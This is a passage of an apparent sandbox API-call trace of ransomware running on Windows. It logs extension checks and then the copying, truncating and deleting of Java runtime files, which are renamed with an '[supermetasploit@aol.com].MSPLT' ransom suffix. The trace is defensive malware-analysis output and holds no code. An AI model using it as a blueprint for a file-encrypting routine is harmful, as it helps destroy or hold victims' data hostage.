3 [0308.560] lstrcmpiW (lpString1=".7z", lpString2="ttf") returned -1 [0308.560] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaTypewriterRegular.ttf") returned 72 [0308.560] lstrlenW (lpString=".dbf") returned 4 [0308.560] lstrcmpiW (lpString1=".dbf", lpString2=".ttf") returned -1 [0308.560] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaTypewriterRegular.ttf") returned 72 [0308.560] lstrlenW (lpString=".1cd") returned 4 [0308.560] lstrcmpiW (lpString1=".1cd", lpString2=".ttf") returned -1 [0308.560] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaTypewriterRegular.ttf") returned 72 [0308.560] lstrlenW (lpString=".jpg") returned 4 [0308.560] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1 [0308.561] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaTypewriterRegular.ttf") returned 72 [0308.561] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaTypewriterRegular.ttf") returned 72 [0308.561] lstrlenW (lpString=".doc") returned 4 [0308.561] lstrcmpiW (lpString1=".doc", lpString2=".ttf") returned -1 [0308.561] lstrlenW (lpString=".docx") returned 5 [0308.561] lstrcmpiW (lpString1=".docx", lpString2="r.ttf") returned -1 [0308.561] lstrlenW (lpString=".pdf") returned 4 [0308.561] lstrcmpiW (lpString1=".pdf", lpString2=".ttf") returned -1 [0308.561] lstrlenW (lpString=".xls") returned 4 [0308.561] lstrcmpiW (lpString1=".xls", lpString2=".ttf") returned 1 [0308.561] lstrlenW (lpString=".xlsx") returned 5 [0308.561] lstrcmpiW (lpString1=".xlsx", lpString2="r.ttf") returned -1 [0308.561] lstrlenW (lpString=".ppt") returned 4 [0308.561] lstrcmpiW (lpString1=".ppt", lpString2=".ttf") returned -1 [0308.561] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaTypewriterRegular.ttf") returned 72 [0308.561] lstrlenW (lpString=".zip") returned 4 [0308.561] lstrcmpiW (lpString1=".zip", lpString2=".ttf") returned 1 [0308.561] lstrlenW (lpString=".rar") returned 4 [0308.561] lstrcmpiW (lpString1=".rar", lpString2=".ttf") returned -1 [0308.561] lstrlenW (lpString=".bz2") returned 4 [0308.561] lstrcmpiW (lpString1=".bz2", lpString2=".ttf") returned -1 [0308.561] lstrlenW (lpString=".7z") returned 3 [0308.561] lstrcmpiW (lpString1=".7z", lpString2="ttf") returned -1 [0308.561] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaTypewriterRegular.ttf") returned 72 [0308.561] lstrlenW (lpString=".dbf") returned 4 [0308.561] lstrcmpiW (lpString1=".dbf", lpString2=".ttf") returned -1 [0308.561] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaTypewriterRegular.ttf") returned 72 [0308.561] lstrlenW (lpString=".1cd") returned 4 [0308.562] lstrcmpiW (lpString1=".1cd", lpString2=".ttf") returned -1 [0308.562] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaTypewriterRegular.ttf") returned 72 [0308.562] lstrlenW (lpString=".jpg") returned 4 [0308.562] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1 [0308.562] lstrcmpiW (lpString1=".properties", lpString2=".MSPLT") returned 1 [0308.562] lstrlenW (lpString="javafx.properties") returned 17 [0308.562] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\javafx.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\javafx.properties"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x520 [0308.564] GetFileSizeEx (in: hFile=0x520, lpFileSize=0x349ff14 | out: lpFileSize=0x349ff14*=56) returned 1 [0308.564] CloseHandle (hObject=0x520) returned 1 [0308.564] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\javafx.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\javafx.properties")) returned 0x20 [0308.565] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\javafx.properties.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\javafx.properties.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0308.565] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\javafx.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\javafx.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x520 [0308.565] SetFilePointerEx (in: hFile=0x520, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0308.565] SetFilePointerEx (in: hFile=0x520, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0308.565] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\javafx.properties.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\javafx.properties.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x420 [0308.568] GetLastError () returned 0x0 [0308.568] ReadFile (in: hFile=0x520, lpBuffer=0x3db7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x349fecc, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesRead=0x349fecc*=0x38, lpOverlapped=0x0) returned 1 [0308.569] WriteFile (in: hFile=0x420, lpBuffer=0x3db7020*, nNumberOfBytesToWrite=0x40, lpNumberOfBytesWritten=0x349fc94, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesWritten=0x349fc94*=0x40, lpOverlapped=0x0) returned 1 [0308.571] ReadFile (in: hFile=0x520, lpBuffer=0x3db7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x349fecc, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesRead=0x349fecc*=0x0, lpOverlapped=0x0) returned 1 [0308.571] WriteFile (in: hFile=0x420, lpBuffer=0x3db7020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0x349fc94, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesWritten=0x349fc94*=0xf6, lpOverlapped=0x0) returned 1 [0308.571] SetEndOfFile (hFile=0x420) returned 1 [0308.571] CloseHandle (hObject=0x420) returned 1 [0308.572] SetFilePointerEx (in: hFile=0x520, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0308.572] SetEndOfFile (hFile=0x520) returned 1 [0308.577] CloseHandle (hObject=0x520) returned 1 [0308.577] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\javafx.properties.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0308.578] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\javafx.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\javafx.properties")) returned 1 [0308.578] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\javafx.properties") returned 56 [0308.578] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\javafx.properties") returned 56 [0308.578] lstrlenW (lpString=".doc") returned 4 [0308.578] lstrcmpiW (lpString1=".doc", lpString2="ties") returned -1 [0308.578] lstrlenW (lpString=".docx") returned 5 [0308.578] lstrcmpiW (lpString1=".docx", lpString2="rties") returned -1 [0308.578] lstrlenW (lpString=".pdf") returned 4 [0308.579] lstrcmpiW (lpString1=".pdf", lpString2="ties") returned -1 [0308.579] lstrlenW (lpString=".xls") returned 4 [0308.579] lstrcmpiW (lpString1=".xls", lpString2="ties") returned -1 [0308.579] lstrlenW (lpString=".xlsx") returned 5 [0308.579] lstrcmpiW (lpString1=".xlsx", lpString2="rties") returned -1 [0308.579] lstrlenW (lpString=".ppt") returned 4 [0308.579] lstrcmpiW (lpString1=".ppt", lpString2="ties") returned -1 [0308.579] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\javafx.properties") returned 56 [0308.579] lstrlenW (lpString=".zip") returned 4 [0308.579] lstrcmpiW (lpString1=".zip", lpString2="ties") returned -1 [0308.579] lstrlenW (lpString=".rar") returned 4 [0308.579] lstrcmpiW (lpString1=".rar", lpString2="ties") returned -1 [0308.579] lstrlenW (lpString=".bz2") returned 4 [0308.579] lstrcmpiW (lpString1=".bz2", lpString2="ties") returned -1 [0308.579] lstrlenW (lpString=".7z") returned 3 [0308.579] lstrcmpiW (lpString1=".7z", lpString2="ies") returned -1 [0308.579] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\javafx.properties") returned 56 [0308.579] lstrlenW (lpString=".dbf") returned 4 [0308.579] lstrcmpiW (lpString1=".dbf", lpString2="ties") returned -1 [0308.579] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\javafx.properties") returned 56 [0308.579] lstrlenW (lpString=".1cd") returned 4 [0308.579] lstrcmpiW (lpString1=".1cd", lpString2="ties") returned -1 [0308.579] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\javafx.properties") returned 56 [0308.579] lstrlenW (lpString=".jpg") returned 4 [0308.579] lstrcmpiW (lpString1=".jpg", lpString2="ties") returned -1 [0308.579] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\javafx.properties") returned 56 [0308.579] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\javafx.properties") returned 56 [0308.580] lstrlenW (lpString=".doc") returned 4 [0308.580] lstrcmpiW (lpString1=".doc", lpString2="ties") returned -1 [0308.580] lstrlenW (lpString=".docx") returned 5 [0308.580] lstrcmpiW (lpString1=".docx", lpString2="rties") returned -1 [0308.580] lstrlenW (lpString=".pdf") returned 4 [0308.580] lstrcmpiW (lpString1=".pdf", lpString2="ties") returned -1 [0308.580] lstrlenW (lpString=".xls") returned 4 [0308.580] lstrcmpiW (lpString1=".xls", lpString2="ties") returned -1 [0308.580] lstrlenW (lpString=".xlsx") returned 5 [0308.580] lstrcmpiW (lpString1=".xlsx", lpString2="rties") returned -1 [0308.580] lstrlenW (lpString=".ppt") returned 4 [0308.580] lstrcmpiW (lpString1=".ppt", lpString2="ties") returned -1 [0308.580] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\javafx.properties") returned 56 [0308.580] lstrlenW (lpString=".zip") returned 4 [0308.580] lstrcmpiW (lpString1=".zip", lpString2="ties") returned -1 [0308.580] lstrlenW (lpString=".rar") returned 4 [0308.580] lstrcmpiW (lpString1=".rar", lpString2="ties") returned -1 [0308.580] lstrlenW (lpString=".bz2") returned 4 [0308.580] lstrcmpiW (lpString1=".bz2", lpString2="ties") returned -1 [0308.580] lstrlenW (lpString=".7z") returned 3 [0308.580] lstrcmpiW (lpString1=".7z", lpString2="ies") returned -1 [0308.580] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\javafx.properties") returned 56 [0308.580] lstrlenW (lpString=".dbf") returned 4 [0308.580] lstrcmpiW (lpString1=".dbf", lpString2="ties") returned -1 [0308.580] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\javafx.properties") returned 56 [0308.581] lstrlenW (lpString=".1cd") returned 4 [0308.581] lstrcmpiW (lpString1=".1cd", lpString2="ties") returned -1 [0308.581] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\javafx.properties") returned 56 [0308.581] lstrlenW (lpString=".jpg") returned 4 [0308.581] lstrcmpiW (lpString1=".jpg", lpString2="ties") returned -1 [0308.581] lstrcmpiW (lpString1=".jar", lpString2=".MSPLT") returned -1 [0308.581] lstrlenW (lpString="javaws.jar") returned 10 [0308.581] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\javaws.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\javaws.jar"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x520 [0308.582] GetFileSizeEx (in: hFile=0x520, lpFileSize=0x349ff14 | out: lpFileSize=0x349ff14*=944167) returned 1 [0308.582] CloseHandle (hObject=0x520) returned 1 [0308.582] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\javaws.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\javaws.jar")) returned 0x20 [0308.583] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\javaws.jar.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\javaws.jar.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0308.583] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\javaws.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\javaws.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x520 [0308.583] SetFilePointerEx (in: hFile=0x520, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0308.583] SetFilePointerEx (in: hFile=0x520, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0308.583] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\javaws.jar.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\javaws.jar.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x420 [0308.584] GetLastError () returned 0x0 [0308.584] ReadFile (in: hFile=0x520, lpBuffer=0x3db7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x349fecc, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesRead=0x349fecc*=0xe6827, lpOverlapped=0x0) returned 1 [0308.860] WriteFile (in: hFile=0x420, lpBuffer=0x3db7020*, nNumberOfBytesToWrite=0xe6830, lpNumberOfBytesWritten=0x349fc94, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesWritten=0x349fc94*=0xe6830, lpOverlapped=0x0) returned 1 [0309.087] ReadFile (in: hFile=0x520, lpBuffer=0x3db7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x349fecc, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesRead=0x349fecc*=0x0, lpOverlapped=0x0) returned 1 [0309.087] WriteFile (in: hFile=0x420, lpBuffer=0x3db7020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x349fc94, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesWritten=0x349fc94*=0xe8, lpOverlapped=0x0) returned 1 [0309.087] SetEndOfFile (hFile=0x420) returned 1 [0309.087] CloseHandle (hObject=0x420) returned 1 [0309.321] SetFilePointerEx (in: hFile=0x520, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0309.321] SetEndOfFile (hFile=0x520) returned 1 [0309.350] CloseHandle (hObject=0x520) returned 1 [0309.350] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\javaws.jar.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0310.625] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\javaws.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\javaws.jar")) returned 1 [0310.761] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\javaws.jar") returned 49 [0310.761] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\javaws.jar") returned 49 [0310.761] lstrlenW (lpString=".doc") returned 4 [0310.761] lstrcmpiW (lpString1=".doc", lpString2=".jar") returned -1 [0310.761] lstrlenW (lpString=".docx") returned 5 [0310.761] lstrcmpiW (lpString1=".docx", lpString2="s.jar") returned -1 [0310.761] lstrlenW (lpString=".pdf") returned 4 [0310.761] lstrcmpiW (lpString1=".pdf", lpString2=".jar") returned 1 [0310.761] lstrlenW (lpString=".xls") returned 4 [0310.761] lstrcmpiW (lpString1=".xls", lpString2=".jar") returned 1 [0310.761] lstrlenW (lpString=".xlsx") returned 5 [0310.761] lstrcmpiW (lpString1=".xlsx", lpString2="s.jar") returned -1 [0310.762] lstrlenW (lpString=".ppt") returned 4 [0310.762] lstrcmpiW (lpString1=".ppt", lpString2=".jar") returned 1 [0310.762] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\javaws.jar") returned 49 [0310.762] lstrlenW (lpString=".zip") returned 4 [0310.762] lstrcmpiW (lpString1=".zip", lpString2=".jar") returned 1 [0310.762] lstrlenW (lpString=".rar") returned 4 [0310.762] lstrcmpiW (lpString1=".rar", lpString2=".jar") returned 1 [0310.762] lstrlenW (lpString=".bz2") returned 4 [0310.762] lstrcmpiW (lpString1=".bz2", lpString2=".jar") returned -1 [0310.762] lstrlenW (lpString=".7z") returned 3 [0310.762] lstrcmpiW (lpString1=".7z", lpString2="jar") returned -1 [0310.762] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\javaws.jar") returned 49 [0310.762] lstrlenW (lpString=".dbf") returned 4 [0310.762] lstrcmpiW (lpString1=".dbf", lpString2=".jar") returned -1 [0310.762] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\javaws.jar") returned 49 [0310.762] lstrlenW (lpString=".1cd") returned 4 [0310.762] lstrcmpiW (lpString1=".1cd", lpString2=".jar") returned -1 [0310.762] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\javaws.jar") returned 49 [0310.762] lstrlenW (lpString=".jpg") returned 4 [0310.762] lstrcmpiW (lpString1=".jpg", lpString2=".jar") returned 1 [0310.763] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\javaws.jar") returned 49 [0310.763] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\javaws.jar") returned 49 [0310.763] lstrlenW (lpString=".doc") returned 4 [0310.763] lstrcmpiW (lpString1=".doc", lpString2=".jar") returned -1 [0310.763] lstrlenW (lpString=".docx") returned 5 [0310.763] lstrcmpiW (lpString1=".docx", lpString2="s.jar") returned -1 [0310.763] lstrlenW (lpString=".pdf") returned 4 [0310.763] lstrcmpiW (lpString1=".pdf", lpString2=".jar") returned 1 [0310.763] lstrlenW (lpString=".xls") returned 4 [0310.763] lstrcmpiW (lpString1=".xls", lpString2=".jar") returned 1 [0310.763] lstrlenW (lpString=".xlsx") returned 5 [0310.763] lstrcmpiW (lpString1=".xlsx", lpString2="s.jar") returned -1 [0310.763] lstrlenW (lpString=".ppt") returned 4 [0310.763] lstrcmpiW (lpString1=".ppt", lpString2=".jar") returned 1 [0310.763] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\javaws.jar") returned 49 [0310.763] lstrlenW (lpString=".zip") returned 4 [0310.763] lstrcmpiW (lpString1=".zip", lpString2=".jar") returned 1 [0310.763] lstrlenW (lpString=".rar") returned 4 [0310.763] lstrcmpiW (lpString1=".rar", lpString2=".jar") returned 1 [0310.763] lstrlenW (lpString=".bz2") returned 4 [0310.763] lstrcmpiW (lpString1=".bz2", lpString2=".jar") returned -1 [0310.763] lstrlenW (lpString=".7z") returned 3 [0310.763] lstrcmpiW (lpString1=".7z", lpString2="jar") returned -1 [0310.763] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\javaws.jar") returned 49 [0310.763] lstrlenW (lpString=".dbf") returned 4 [0310.763] lstrcmpiW (lpString1=".dbf", lpString2=".jar") returned -1 [0310.785] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\javaws.jar") returned 49 [0310.785] lstrlenW (lpString=".1cd") returned 4 [0310.785] lstrcmpiW (lpString1=".1cd", lpString2=".jar") returned -1 [0310.785] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\javaws.jar") returned 49 [0310.786] lstrlenW (lpString=".jpg") returned 4 [0310.786] lstrcmpiW (lpString1=".jpg", lpString2=".jar") returned 1 [0310.786] lstrcmpiW (lpString1=".jar", lpString2=".MSPLT") returned -1 [0310.786] lstrlenW (lpString="jfr.jar") returned 7 [0310.786] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfr.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\jfr.jar"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x540 [0310.857] GetFileSizeEx (in: hFile=0x540, lpFileSize=0x349ff14 | out: lpFileSize=0x349ff14*=560581) returned 1 [0310.857] CloseHandle (hObject=0x540) returned 1 [0310.857] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfr.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\jfr.jar")) returned 0x20 [0310.869] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfr.jar.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\jfr.jar.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0310.869] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfr.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\jfr.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x53c [0310.869] SetFilePointerEx (in: hFile=0x53c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0310.869] SetFilePointerEx (in: hFile=0x53c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0310.870] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfr.jar.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\jfr.jar.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x544 [0310.871] GetLastError () returned 0x0 [0310.871] ReadFile (in: hFile=0x53c, lpBuffer=0x3db7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x349fecc, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesRead=0x349fecc*=0x88dc5, lpOverlapped=0x0) returned 1 [0311.952] WriteFile (in: hFile=0x544, lpBuffer=0x3db7020*, nNumberOfBytesToWrite=0x88dd0, lpNumberOfBytesWritten=0x349fc94, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesWritten=0x349fc94*=0x88dd0, lpOverlapped=0x0) returned 1 [0311.988] ReadFile (in: hFile=0x53c, lpBuffer=0x3db7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x349fecc, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesRead=0x349fecc*=0x0, lpOverlapped=0x0) returned 1 [0311.988] WriteFile (in: hFile=0x544, lpBuffer=0x3db7020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x349fc94, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesWritten=0x349fc94*=0xe2, lpOverlapped=0x0) returned 1 [0311.988] SetEndOfFile (hFile=0x544) returned 1 [0311.988] CloseHandle (hObject=0x544) returned 1 [0312.497] SetFilePointerEx (in: hFile=0x53c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0312.497] SetEndOfFile (hFile=0x53c) returned 1 [0312.599] CloseHandle (hObject=0x53c) returned 1 [0312.599] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfr.jar.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0313.632] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfr.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\jfr.jar")) returned 1 [0313.990] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfr.jar") returned 46 [0313.990] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfr.jar") returned 46 [0313.990] lstrlenW (lpString=".doc") returned 4 [0313.990] lstrcmpiW (lpString1=".doc", lpString2=".jar") returned -1 [0313.990] lstrlenW (lpString=".docx") returned 5 [0313.991] lstrcmpiW (lpString1=".docx", lpString2="r.jar") returned -1 [0313.991] lstrlenW (lpString=".pdf") returned 4 [0313.991] lstrcmpiW (lpString1=".pdf", lpString2=".jar") returned 1 [0313.991] lstrlenW (lpString=".xls") returned 4 [0313.991] lstrcmpiW (lpString1=".xls", lpString2=".jar") returned 1 [0313.991] lstrlenW (lpString=".xlsx") returned 5 [0313.991] lstrcmpiW (lpString1=".xlsx", lpString2="r.jar") returned -1 [0313.991] lstrlenW (lpString=".ppt") returned 4 [0313.991] lstrcmpiW (lpString1=".ppt", lpString2=".jar") returned 1 [0313.991] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfr.jar") returned 46 [0313.991] lstrlenW (lpString=".zip") returned 4 [0313.991] lstrcmpiW (lpString1=".zip", lpString2=".jar") returned 1 [0313.991] lstrlenW (lpString=".rar") returned 4 [0313.991] lstrcmpiW (lpString1=".rar", lpString2=".jar") returned 1 [0313.991] lstrlenW (lpString=".bz2") returned 4 [0313.991] lstrcmpiW (lpString1=".bz2", lpString2=".jar") returned -1 [0313.991] lstrlenW (lpString=".7z") returned 3 [0313.991] lstrcmpiW (lpString1=".7z", lpString2="jar") returned -1 [0313.991] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfr.jar") returned 46 [0313.991] lstrlenW (lpString=".dbf") returned 4 [0313.991] lstrcmpiW (lpString1=".dbf", lpString2=".jar") returned -1 [0313.991] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfr.jar") returned 46 [0313.991] lstrlenW (lpString=".1cd") returned 4 [0313.991] lstrcmpiW (lpString1=".1cd", lpString2=".jar") returned -1 [0313.992] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfr.jar") returned 46 [0313.992] lstrlenW (lpString=".jpg") returned 4 [0313.992] lstrcmpiW (lpString1=".jpg", lpString2=".jar") returned 1 [0313.992] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfr.jar") returned 46 [0313.992] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfr.jar") returned 46 [0313.992] lstrlenW (lpString=".doc") returned 4 [0313.992] lstrcmpiW (lpString1=".doc", lpString2=".jar") returned -1 [0313.992] lstrlenW (lpString=".docx") returned 5 [0313.992] lstrcmpiW (lpString1=".docx", lpString2="r.jar") returned -1 [0313.992] lstrlenW (lpString=".pdf") returned 4 [0313.992] lstrcmpiW (lpString1=".pdf", lpString2=".jar") returned 1 [0313.992] lstrlenW (lpString=".xls") returned 4 [0313.992] lstrcmpiW (lpString1=".xls", lpString2=".jar") returned 1 [0313.992] lstrlenW (lpString=".xlsx") returned 5 [0313.992] lstrcmpiW (lpString1=".xlsx", lpString2="r.jar") returned -1 [0313.992] lstrlenW (lpString=".ppt") returned 4 [0313.992] lstrcmpiW (lpString1=".ppt", lpString2=".jar") returned 1 [0313.992] lstrlenW (lpString="C:\\Program 